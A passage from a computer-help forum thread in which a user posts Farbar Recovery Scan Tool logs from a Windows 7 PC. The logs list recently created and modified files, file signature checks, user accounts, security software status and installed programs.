2017-03-15 19:42 - 2017-02-09 12:14 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:14 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 12:03 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-03-15 19:42 - 2017-02-09 12:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-03-15 19:42 - 2017-02-09 12:03 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-03-15 19:42 - 2017-02-09 12:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-03-15 19:42 - 2017-02-09 12:00 - 03220480 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-03-15 19:42 - 2017-02-09 11:59 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-03-15 19:42 - 2017-02-09 11:58 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-03-15 19:42 - 2017-02-09 11:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-03-15 19:42 - 2017-02-09 11:55 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-03-15 19:42 - 2017-02-09 11:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-03-15 19:42 - 2017-02-09 11:54 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-03-15 19:42 - 2017-02-09 11:54 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-03-15 19:42 - 2017-02-09 11:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-03-15 19:42 - 2017-02-09 11:51 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WcsPlugInService.dll
2017-03-15 19:42 - 2017-02-09 11:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-03-15 19:42 - 2017-02-09 11:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-03-15 19:42 - 2017-02-09 11:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-03-15 19:42 - 2017-02-09 11:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-03-15 19:42 - 2017-02-09 11:49 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 11:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-03-15 19:42 - 2017-02-09 10:06 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-03-15 19:42 - 2017-02-09 10:06 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-03-15 19:42 - 2017-02-06 12:14 - 00733696 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-03-15 19:42 - 2017-01-13 14:00 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-03-15 19:42 - 2017-01-13 14:00 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2017-03-15 19:42 - 2017-01-13 13:45 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-03-15 19:42 - 2017-01-13 13:45 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2017-03-15 19:42 - 2017-01-11 14:01 - 01887744 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2017-03-15 19:42 - 2017-01-11 14:01 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2017-03-15 19:42 - 2017-01-11 13:43 - 01241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2017-03-15 19:42 - 2017-01-11 13:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2017-03-15 19:42 - 2017-01-06 14:00 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2017-03-15 19:42 - 2017-01-06 13:44 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2017-03-15 19:38 - 2017-02-22 19:42 - 00084712 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-03-15 19:38 - 2017-02-22 19:37 - 01285632 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-03-15 19:38 - 2017-02-18 10:05 - 01609216 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-03-15 19:38 - 2017-02-18 10:05 - 00646656 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-03-15 19:38 - 2016-12-31 11:36 - 00133632 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2017-03-15 06:10 - 2017-03-15 06:10 - 00003128 _____ C:\Windows\System32\Tasks\DRScanner Startup
2017-03-15 06:10 - 2017-03-15 06:10 - 00002038 _____ C:\Users\Public\Desktop\HouseCall for Home Networks.lnk
2017-03-15 06:10 - 2017-03-15 06:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HouseCall for Home Networks
2017-03-15 06:10 - 2017-03-15 06:10 - 00000000 ____D C:\Program Files\WinPcap
2017-03-14 15:49 - 2017-03-14 15:49 - 00000000 ____D C:\Windows\Trend Micro
2017-03-14 15:44 - 2017-03-14 15:44 - 02527376 _____ (Trend Micro Inc.) C:\Users\KEKLR\Downloads\HousecallLauncher64 (1).exe
2017-03-14 15:42 - 2017-03-14 15:42 - 02527376 _____ (Trend Micro Inc.) C:\Users\KEKLR\Downloads\HousecallLauncher64.exe
2017-03-14 14:53 - 2017-03-14 14:53 - 00073600 _____ C:\Users\KEKLR\Documents\Oklahoma’s Deadliest Tornado-3.pdf
2017-03-14 14:17 - 2017-03-14 14:18 - 00073594 _____ C:\Users\KEKLR\Downloads\Oklahoma’s Deadliest Tornado.pdf
2017-03-14 14:07 - 2017-04-11 17:34 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-03-14 14:07 - 2017-03-14 14:07 - 00002047 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk
2017-03-14 13:49 - 2017-03-14 13:49 - 01204344 _____ (Adobe Systems Incorporated) C:\Users\KEKLR\Downloads\readerdc_en_xa_install.exe
2017-03-12 19:38 - 2017-03-12 19:39 - 02822778 _____ C:\Users\KEKLR\Downloads\Attachments_2017312.zip

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-11 17:36 - 2015-05-13 20:23 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-04-11 17:30 - 2016-10-16 19:56 - 00000911 _____ C:\Windows\Tasks\EPSON WF-3620 Series Update {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job
2017-04-11 17:30 - 2016-10-16 19:56 - 00000725 _____ C:\Windows\Tasks\EPSON WF-3620 Series Invitation {3B76C7EA-C0FF-4F54-B66C-1997DF8C469D}.job
2017-04-11 06:56 - 2009-07-14 01:32 - 00000000 ____D C:\Windows\system32\FxsTmp
2017-04-11 06:51 - 2009-07-14 00:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-11 06:51 - 2009-07-14 00:45 - 00026192 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-11 06:46 - 2014-05-16 06:41 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-11 06:45 - 2014-05-16 06:41 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2017-04-10 20:57 - 2010-01-02 05:15 - 00001042 _____ C:\Users\KEKLR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-04-10 18:01 - 2017-01-31 19:16 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForKEKLR


Edited by krtate, 11 April 2017 - 04:55 PM.


#26 krtate

Posted 11 April 2017 - 04:51 PM

2017-04-10 18:01 - 2017-01-31 19:16 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForKEKLR.job
2017-04-09 19:52 - 2010-01-02 05:15 - 00000186 _____ C:\ProgramData\HPWALog.txt
2017-04-09 19:49 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-09 18:07 - 2009-07-14 01:13 - 00788704 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-09 18:07 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\inf
2017-04-09 17:56 - 2010-03-18 13:26 - 00000000 ____D C:\Users\KEKLR\AppData\LocalLow\Temp
2017-04-09 08:10 - 2010-10-16 09:21 - 00000000 ____D C:\Program Files (x86)\Coupons
2017-04-08 17:28 - 2011-12-25 21:27 - 08905685 _____ C:\Users\KEKLR\AppData\Local\census.cache
2017-04-08 17:25 - 2011-12-25 21:27 - 00126206 _____ C:\Users\KEKLR\AppData\Local\ars.cache
2017-04-08 15:25 - 2012-02-03 08:53 - 00002127 _____ C:\Windows\epplauncher.mif
2017-04-08 15:09 - 2011-02-27 20:01 - 00000000 ____D C:\ProgramData\F-Secure
2017-04-08 13:51 - 2016-11-24 19:27 - 00000000 ____D C:\Users\KEKLR\AppData\LocalLow\Mozilla
2017-04-08 13:20 - 2015-04-25 11:35 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-04-08 13:13 - 2009-08-09 03:51 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2017-04-08 12:45 - 2010-03-09 18:28 - 00000000 ____D C:\Users\KEKLR\Documents\Mitchell Family 2009
2017-04-08 12:39 - 2010-01-19 08:35 - 00000000 ____D C:\Program Files (x86)\Trend Micro
2017-04-08 10:52 - 2012-08-13 00:24 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-08 10:51 - 2012-08-13 00:24 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-07 18:06 - 2010-01-02 05:19 - 00532136 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2017-04-03 21:39 - 2011-01-13 09:53 - 00000000 ____D C:\Users\KEKLR\Documents\Moms cards sayings
2017-04-02 19:19 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\rescache
2017-04-02 18:18 - 2016-11-23 10:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-02 18:18 - 2012-04-30 06:20 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-03-22 06:47 - 2016-06-08 18:17 - 00000000 ____D C:\Users\KEKLR\Documents\DigiStamps
2017-03-19 20:14 - 2009-07-14 00:45 - 00464288 _____ C:\Windows\system32\FNTCACHE.DAT
2017-03-19 20:13 - 2015-02-20 18:53 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2017-03-19 20:13 - 2015-02-20 18:53 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2017-03-19 20:10 - 2014-12-10 15:46 - 00000000 ____D C:\Windows\system32\appraiser
2017-03-19 20:10 - 2014-05-06 13:32 - 00000000 ___SD C:\Windows\system32\CompatTel
2017-03-19 20:10 - 2009-07-14 01:32 - 00000000 ____D C:\Program Files\DVD Maker
2017-03-19 19:45 - 2013-07-27 22:12 - 00000000 ____D C:\Windows\system32\MRT
2017-03-17 06:39 - 2010-01-03 15:16 - 138634176 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-03-17 06:32 - 2015-02-20 18:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-03-14 14:50 - 2015-07-10 05:57 - 02244280 _____ C:\Users\KEKLR\Documents\AdobeAcroCleaner_DC2015.exe
2017-03-14 14:09 - 2014-08-22 07:59 - 00000000 ____D C:\Users\KEKLR\AppData\Local\Adobe
2017-03-14 12:31 - 2014-05-22 19:38 - 00000000 ____D C:\Users\KEKLR\Documents\Taylor Tax
2017-03-14 08:46 - 2012-03-29 09:12 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-03-14 08:46 - 2012-03-29 09:12 - 00004312 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-03-14 08:46 - 2011-05-19 12:44 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-03-14 08:45 - 2012-01-05 06:12 - 00000000 ____D C:\Windows\system32\Macromed
2017-03-14 08:45 - 2009-08-09 03:40 - 00000000 ____D C:\Windows\SysWOW64\Macromed

==================== Files in the root of some directories =======

2014-11-13 10:45 - 2014-11-13 10:45 - 6000640 _____ () C:\Program Files (x86)\GUTAF36.tmp
2011-03-24 19:07 - 2011-06-12 16:08 - 0001854 _____ () C:\Users\KEKLR\AppData\Roaming\GhostObjGAFix.xml
2010-01-13 12:03 - 2013-08-26 15:30 - 0001356 _____ () C:\Users\KEKLR\AppData\Roaming\wklnhst.dat
2011-12-25 21:27 - 2017-04-08 17:25 - 0126206 _____ () C:\Users\KEKLR\AppData\Local\ars.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\AtStart.txt
2011-12-25 21:27 - 2017-04-08 17:28 - 8905685 _____ () C:\Users\KEKLR\AppData\Local\census.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\DSwitch.txt
2010-05-03 10:28 - 2010-05-03 10:28 - 0000036 _____ () C:\Users\KEKLR\AppData\Local\housecall.guid.cache
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\QSwitch.txt
2012-01-05 08:43 - 2012-01-05 09:26 - 0007598 _____ () C:\Users\KEKLR\AppData\Local\Resmon.ResmonCfg
2014-05-03 11:58 - 2014-05-03 11:58 - 0000010 _____ () C:\Users\KEKLR\AppData\Local\sponge.last.runtime.cache
2011-01-25 22:09 - 2011-01-25 22:09 - 0152028 _____ () C:\Users\KEKLR\AppData\Local\tmpIZZY%20ON%20TRAMPOLINE[1].0
2011-01-25 22:09 - 2011-01-25 22:09 - 0175047 _____ () C:\Users\KEKLR\AppData\Local\tmpIZZY%20ON%20TRAMPOLINE[1].JPG
2017-04-08 15:18 - 2017-04-08 15:18 - 0047906 _____ () C:\ProgramData\agent.1491679133.bdinstall.bin
2017-04-08 15:27 - 2017-04-08 15:27 - 0028972 _____ () C:\ProgramData\agent.1491679676.bdinstall.bin
2017-04-08 15:31 - 2017-04-08 15:31 - 0028766 _____ () C:\ProgramData\agent.1491679893.bdinstall.bin
2017-04-08 16:52 - 2017-04-08 16:52 - 0029153 _____ () C:\ProgramData\agent.1491684753.bdinstall.bin
2013-09-01 17:00 - 2013-09-01 17:00 - 0000057 _____ () C:\ProgramData\Ament.ini
2010-01-02 05:15 - 2017-04-09 19:52 - 0000186 _____ () C:\ProgramData\HPWALog.txt
2010-01-13 10:46 - 2016-11-23 07:48 - 0006069 _____ () C:\ProgramData\hpzinstall.log

Some files in TEMP:
====================
2017-04-09 18:57 - 2017-02-09 12:33 - 1732864 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-04-09 09:44

==================== End of FRST.txt ============================



#27 krtate

Posted 11 April 2017 - 04:56 PM

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by KEKLR (11-04-2017 17:42:33)
Running from C:\Users\KEKLR\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-01-02 09:06:14)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3698744866-2675293530-421701469-500 - Administrator - Disabled)
Guest (S-1-5-21-3698744866-2675293530-421701469-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3698744866-2675293530-421701469-1002 - Limited - Enabled)
KEKLR (S-1-5-21-3698744866-2675293530-421701469-1001 - Administrator - Enabled) => C:\Users\KEKLR

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189}
AS: Microsoft Security Essentials (Enabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activate Norton Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.1.20.0 - Symantec)
Administrative Medical Assisting, 6th Edition (HKLM-x32\...\Administrative Medical Assisting_is1) (Version:  - Cengage Learning)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9130 - Adobe Systems Inc.)
Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.5.9.620 - Adobe Systems, Inc.)
Amazon Kindle (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Amazon Kindle) (Version:  - Amazon)
Bible Data Type System Files (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Camera Window DS (x32 Version: 5.2 - Canon) Hidden
Camera Window DVC (x32 Version: 5.4 - Canon) Hidden
Camera Window MC (x32 Version: 5.4 - Canon) Hidden
Canon Camera Window DC_DV 5 for ZoomBrowser EX (HKLM-x32\...\InstallShield_{001AB29C-5468-4972-8D24-2EBDB2B12133}) (Version: 5.4 - Canon)
Canon Camera Window DS for ZoomBrowser EX (HKLM-x32\...\InstallShield_{6B8BDABA-6737-4998-AEE4-E218EDE5FC7A}) (Version: 5.2 - Canon)
Canon Camera Window MC 5 for ZoomBrowser EX (HKLM-x32\...\InstallShield_{89EB3ED7-225A-412E-B048-623D502C000F}) (Version: 5.4 - Canon)
Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\InstallShield_{68D27126-BF6A-457D-8DD0-5F35E8D41310}) (Version: 1.3.1.21 - Canon)
Canon RAW Image Task for ZoomBrowser EX (HKLM-x32\...\InstallShield_{001EB665-D9EC-415E-9E13-AD2125B2B992}) (Version: 2.1 - Canon)
Canon Utilities PhotoStitch 3.1 (HKLM-x32\...\InstallShield_{218BBBE3-FE63-4BB2-81A8-7435575A84FA}) (Version: 3.1.14 - Canon)
Canon ZoomBrowser EX (HKLM-x32\...\{C1D76D7A-F3BB-47EA-A746-5B1E2FFC1DF2}) (Version: 5.02.0100 - Canon)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.3.0.5014 - Citrix Systems, Inc.)
Common System Files (x32 Version: 1.00.0002 - Libronix Corp.) Hidden
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
CutePDF Writer 2.8 (HKLM\...\CutePDF Writer Installation) (Version:  - )
CyberLink DVD Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.3101 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
ENE CIR Receiver Driver (HKLM\...\FFE7D41DF3C645075BB149E21988B63996C34187) (Version: 2.7.4.0 - ENE)
Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.81.0000 - Seiko Epson Corporation)
Epson Event Manager (HKLM-x32\...\{9F205E94-9E42-4486-A92A-DF3F6CB85444}) (Version: 3.10.0061 - Seiko Epson Corporation)
Epson FAX Utility (HKLM-x32\...\{0CBE6C93-CB2E-4378-91EE-12BE6D4E2E4A}) (Version: 2.00.00 - Seiko Epson Corporation)
Epson PC-FAX Driver (HKLM-x32\...\EPSON PC-FAX Driver 2) (Version:  - Seiko Epson Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
EPSON Scan OCR Component (HKLM-x32\...\{563B99D8-8895-4E3E-AE8D-15BE8C05F1C1}) (Version: 2.30.00 - SEIKO EPSON Corp.)
EPSON Scan PDF Extensions (HKLM-x32\...\{F9956472-6E16-4F83-BF9A-F887EF4A45B7}) (Version: 1.03.0001 - SEIKO EPSON Corp.)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
EPSON WF-3620 Series Printer Uninstall (HKLM\...\EPSON WF-3620 Series) (Version:  - SEIKO EPSON Corporation)
Epson WF-3620 User’s Guide version 1.0 (HKLM-x32\...\UsersGuideEpson WF-3620 User’s Guide_is1) (Version: 1.0 - )
EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.6.0 - SEIKO EPSON CORPORATION)
ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version:  - )
Facebook Plug-In (HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Facebook Plug-In) (Version:  - Facebook, Inc.)
FileHippo.com Update Checker (HKLM-x32\...\FileHippo.com) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HiJackThis (HKLM-x32\...\{45A66726-69BC-466B-A7A4-12FCBA4883D7}) (Version: 1.0.0 - Trend Micro)
Homepage Protection (HKLM-x32\...\Homepage Protection) (Version:  - AOL Products)
HouseCall for Home Networks (HKLM\...\DRScanner) (Version: 2.1.1183 - Trend Micro Inc.)
HP 3D DriveGuard (HKLM\...\{85A42FF0-F0D0-44A3-B226-C124D6E8B1D5}) (Version: 4.0.3.1 - Hewlett-Packard)
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.12286.3436 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP Integrated Module with Bluetooth wireless technology (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.0.9602 - Broadcom Corporation)
